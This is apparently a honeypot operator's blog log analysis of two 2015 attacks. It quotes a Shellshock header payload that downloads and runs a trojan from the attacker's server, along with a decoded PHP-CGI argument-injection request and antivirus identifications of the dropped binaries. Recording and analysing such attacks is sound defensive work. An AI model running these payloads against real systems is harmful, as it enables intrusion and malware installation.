{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}

All attacks were originated from the same source IP:
  •  211.147.2.192
"ip": "211.147.2.192",
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "China",
            "countrycode": "CN"
         },
There were three different files within the attacks
  •  ./1122.32: Linux.Trojan.IptabLex FOUND
  • ./1122.64: Linux.Trojan.IptabLex FOUND
  • ./8uc: Unix.Trojan.DDoS_XOR-1 FOUND
pi@raspberrypi ~/ana $ file 1122.32
1122.32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically li            nked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 1122.64
1122.64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked,  for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 8uc
8uc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked , for GNU/Linux 2.6.9, not stripped

Samstag, 4. Juli 2015

Urlencoded attack by 198.154.63.131

 After some weeks with really not much going on on the honeypot, I had an urlencoded attack yesterday.
{"message":"Jul 4 06:41:57 localhost [mypyfwa] 2015-07-04 06:41:57.032661 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1 198.154.63.131 US Length","@version":"1","@timestamp":"2015-07-04T04:41:57.587Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"12613","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}

The url decodes to

 cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n
 This sort of attacks are not that interesting, at least to me.
The attack was launched from US by

NetType:        Direct Allocation
OriginAS:       AS26272
Organization:   FortaTrust USA Corporation (FUC-9)
 
The IBM XForce Exchange data shows
{
   "cats": {},
   "geo": {
      "country": "United States",
      "countrycode": "US"
   },
   "ip": "198.154.63.131",
   "score": 1,
   "subnets": [
      {
         "cats": {},
         "created": "2012-09-15T06:28:00.000Z",
         "geo": {
            "country": "United States",
            "countrycode": "US"
         },
         "ip": "198.154.60.0",
         "reason": "Regional Internet Registry",
         "score": 1,
         "subnet": "198.154.60.0/22"
      }
   ]
}